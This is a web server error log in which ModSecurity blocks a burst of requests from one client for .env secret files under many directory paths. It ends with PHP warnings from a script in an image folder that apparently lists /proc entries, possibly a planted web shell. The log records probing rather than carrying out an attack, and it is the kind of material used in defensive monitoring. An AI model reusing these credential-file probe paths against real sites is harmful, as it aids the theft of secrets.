[Mon May 11 16:25:32.957719 2026] [security2:error] [pid 1411099:tid 1411120] [client 18.180.54.2:58024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/admin/.env"] [unique_id "agHm3A-Qm4vhlWBPlMi5rAAAABQ"]
[Mon May 11 16:25:32.958454 2026] [core:error] [pid 1411099:tid 1411120] [client 18.180.54.2:58024] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:32.958664 2026] [security2:error] [pid 1411099:tid 1411120] [client 18.180.54.2:58024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/admin/.env"] [unique_id "agHm3A-Qm4vhlWBPlMi5rAAAABQ"]
[Mon May 11 16:25:33.209272 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:58036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/server/.env"] [unique_id "agHm3UWKUxpmnkK7zHx7nAAAAQY"]
[Mon May 11 16:25:33.209515 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:58036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/server/.env"] [unique_id "agHm3UWKUxpmnkK7zHx7nAAAAQY"]
[Mon May 11 16:25:33.214103 2026] [core:error] [pid 1411055:tid 1411063] [client 18.180.54.2:58036] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:33.214304 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:58036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/server/.env"] [unique_id "agHm3UWKUxpmnkK7zHx7nAAAAQY"]
[Mon May 11 16:25:33.697799 2026] [security2:error] [pid 1411201:tid 1411259] [client 18.180.54.2:58040] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/backend/.env"] [unique_id "agHm3fy_GXSWIKeli0vx9wAAAI0"]
[Mon May 11 16:25:33.698040 2026] [security2:error] [pid 1411201:tid 1411259] [client 18.180.54.2:58040] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/backend/.env"] [unique_id "agHm3fy_GXSWIKeli0vx9wAAAI0"]
[Mon May 11 16:25:33.698632 2026] [core:error] [pid 1411201:tid 1411259] [client 18.180.54.2:58040] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:33.698802 2026] [security2:error] [pid 1411201:tid 1411259] [client 18.180.54.2:58040] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/backend/.env"] [unique_id "agHm3fy_GXSWIKeli0vx9wAAAI0"]
[Mon May 11 16:25:33.951303 2026] [security2:error] [pid 1416109:tid 1416147] [client 18.180.54.2:58044] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/frontend/.env"] [unique_id "agHm3VV4kyjgo4bQBUhT8gAAANE"]
[Mon May 11 16:25:33.951537 2026] [security2:error] [pid 1416109:tid 1416147] [client 18.180.54.2:58044] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/frontend/.env"] [unique_id "agHm3VV4kyjgo4bQBUhT8gAAANE"]
[Mon May 11 16:25:33.952049 2026] [core:error] [pid 1416109:tid 1416147] [client 18.180.54.2:58044] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:33.952216 2026] [security2:error] [pid 1416109:tid 1416147] [client 18.180.54.2:58044] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/frontend/.env"] [unique_id "agHm3VV4kyjgo4bQBUhT8gAAANE"]
[Mon May 11 16:25:34.396963 2026] [security2:error] [pid 1412074:tid 1412089] [client 18.180.54.2:58048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/server/.env"] [unique_id "agHm3jJnyuKVXoStDha0SgAAAE0"]
[Mon May 11 16:25:34.397215 2026] [security2:error] [pid 1412074:tid 1412089] [client 18.180.54.2:58048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/server/.env"] [unique_id "agHm3jJnyuKVXoStDha0SgAAAE0"]
[Mon May 11 16:25:34.397801 2026] [core:error] [pid 1412074:tid 1412089] [client 18.180.54.2:58048] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:34.397964 2026] [security2:error] [pid 1412074:tid 1412089] [client 18.180.54.2:58048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/server/.env"] [unique_id "agHm3jJnyuKVXoStDha0SgAAAE0"]
[Mon May 11 16:25:34.650675 2026] [security2:error] [pid 1411099:tid 1411119] [client 18.180.54.2:58064] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/src/.env"] [unique_id "agHm3g-Qm4vhlWBPlMi5swAAABM"]
[Mon May 11 16:25:34.650893 2026] [security2:error] [pid 1411099:tid 1411119] [client 18.180.54.2:58064] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/src/.env"] [unique_id "agHm3g-Qm4vhlWBPlMi5swAAABM"]
[Mon May 11 16:25:34.651699 2026] [core:error] [pid 1411099:tid 1411119] [client 18.180.54.2:58064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:34.652109 2026] [security2:error] [pid 1411099:tid 1411119] [client 18.180.54.2:58064] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/src/.env"] [unique_id "agHm3g-Qm4vhlWBPlMi5swAAABM"]
[Mon May 11 16:25:35.080707 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:58076] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/frontend/.env"] [unique_id "agHm3_y_GXSWIKeli0vx-QAAAIM"]
[Mon May 11 16:25:35.080945 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:58076] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/frontend/.env"] [unique_id "agHm3_y_GXSWIKeli0vx-QAAAIM"]
[Mon May 11 16:25:35.081446 2026] [core:error] [pid 1411201:tid 1411249] [client 18.180.54.2:58076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:35.081606 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:58076] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/frontend/.env"] [unique_id "agHm3_y_GXSWIKeli0vx-QAAAIM"]
[Mon May 11 16:25:35.373530 2026] [security2:error] [pid 1412074:tid 1412081] [client 18.180.54.2:58092] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/core/.env"] [unique_id "agHm3zJnyuKVXoStDha0TAAAAEU"]
[Mon May 11 16:25:35.373756 2026] [security2:error] [pid 1412074:tid 1412081] [client 18.180.54.2:58092] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/core/.env"] [unique_id "agHm3zJnyuKVXoStDha0TAAAAEU"]
[Mon May 11 16:25:35.374290 2026] [core:error] [pid 1412074:tid 1412081] [client 18.180.54.2:58092] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:35.374456 2026] [security2:error] [pid 1412074:tid 1412081] [client 18.180.54.2:58092] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/core/.env"] [unique_id "agHm3zJnyuKVXoStDha0TAAAAEU"]
[Mon May 11 16:25:35.761881 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.180.54.2:58102] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/src/.env"] [unique_id "agHm3_y_GXSWIKeli0vx-gAAAJQ"]
[Mon May 11 16:25:35.762236 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.180.54.2:58102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/src/.env"] [unique_id "agHm3_y_GXSWIKeli0vx-gAAAJQ"]
[Mon May 11 16:25:35.762988 2026] [core:error] [pid 1411201:tid 1411265] [client 18.180.54.2:58102] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:35.763218 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.180.54.2:58102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/src/.env"] [unique_id "agHm3_y_GXSWIKeli0vx-gAAAJQ"]
[Mon May 11 16:25:36.075054 2026] [security2:error] [pid 1416109:tid 1416153] [client 18.180.54.2:58116] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/core/app/.env"] [unique_id "agHm4FV4kyjgo4bQBUhT9AAAANc"]
[Mon May 11 16:25:36.075339 2026] [security2:error] [pid 1416109:tid 1416153] [client 18.180.54.2:58116] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/core/app/.env"] [unique_id "agHm4FV4kyjgo4bQBUhT9AAAANc"]
[Mon May 11 16:25:36.075969 2026] [core:error] [pid 1416109:tid 1416153] [client 18.180.54.2:58116] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:36.076138 2026] [security2:error] [pid 1416109:tid 1416153] [client 18.180.54.2:58116] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/core/app/.env"] [unique_id "agHm4FV4kyjgo4bQBUhT9AAAANc"]
[Mon May 11 16:25:36.456497 2026] [security2:error] [pid 1411055:tid 1411071] [client 18.180.54.2:58124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/core/.env"] [unique_id "agHm4EWKUxpmnkK7zHx7nwAAAQ4"]
[Mon May 11 16:25:36.456724 2026] [security2:error] [pid 1411055:tid 1411071] [client 18.180.54.2:58124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/core/.env"] [unique_id "agHm4EWKUxpmnkK7zHx7nwAAAQ4"]
[Mon May 11 16:25:36.457241 2026] [core:error] [pid 1411055:tid 1411071] [client 18.180.54.2:58124] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:36.457402 2026] [security2:error] [pid 1411055:tid 1411071] [client 18.180.54.2:58124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/core/.env"] [unique_id "agHm4EWKUxpmnkK7zHx7nwAAAQ4"]
[Mon May 11 16:25:36.795687 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:58134] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/config/.env"] [unique_id "agHm4EWKUxpmnkK7zHx7oAAAAQI"]
[Mon May 11 16:25:36.795911 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:58134] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/config/.env"] [unique_id "agHm4EWKUxpmnkK7zHx7oAAAAQI"]
[Mon May 11 16:25:36.796455 2026] [core:error] [pid 1411055:tid 1411059] [client 18.180.54.2:58134] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:36.796625 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:58134] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/config/.env"] [unique_id "agHm4EWKUxpmnkK7zHx7oAAAAQI"]
PHP Warning:  filesize(): stat failed for /proc/552/task/552/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/552/task/552/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/552/task/552/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/552/task/552/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
